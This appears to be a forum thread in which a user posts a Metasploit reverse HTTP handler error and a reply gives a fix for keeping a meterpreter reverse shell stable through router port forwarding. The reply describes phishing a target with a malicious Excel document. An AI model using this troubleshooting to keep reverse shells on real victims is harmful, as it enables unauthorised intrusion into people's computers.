July 22, 2017, 07:39:26 AM
Welcome, Guest. Please login or register.

You Did *NOT* Just Win a Nigerian Lottery...

Author Topic: Metasploit session error  (Read 711 times)

Offline ErSecco

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 17
  • Internets: +0/-1
Metasploit session error
« on: October 27, 2015, 03:28:41 PM »
Hi Guys! I got this error on metasploit

msf exploit(handler) > exploit

  • Started HTTP reverse handler on http://0.0.0.0:4444/
  • Starting the payload handler...
  • 192.168.0.107:61364 (UUID: d94ed4fbd394298f/python=20/python=21/2015-10-27T21:35:54Z) Staging Native payload ...
  • [-] Exception handling request: undefined method `[]' for nil:NilClass

     I've shared port 4444 on the router for my local IP.
    where I have mistaked?

Estimate yourself and you will be estimated

Offline Ð4NG3RΩµ$ @£TØ1Ð

  • Prospect
  • *
  • Posts: 4
  • Internets: +0/-0
Re: Metasploit session error
« Reply #1 on: January 29, 2016, 10:37:08 PM »
I've been here before. Instead of putting your LHOST as 0.0.0.0 or 127.0.0.1 or its actual IP (local), put the routers IP in there. Should work if you are wanting to get a stable meterpreter shell after forwarding from your Internet facing router.

I ran into this before when I was trying to figure out the same issue. I was doing a SE gig and the person would click on a malicious Excel document and I would lose a shell. Did that ^above and it worked.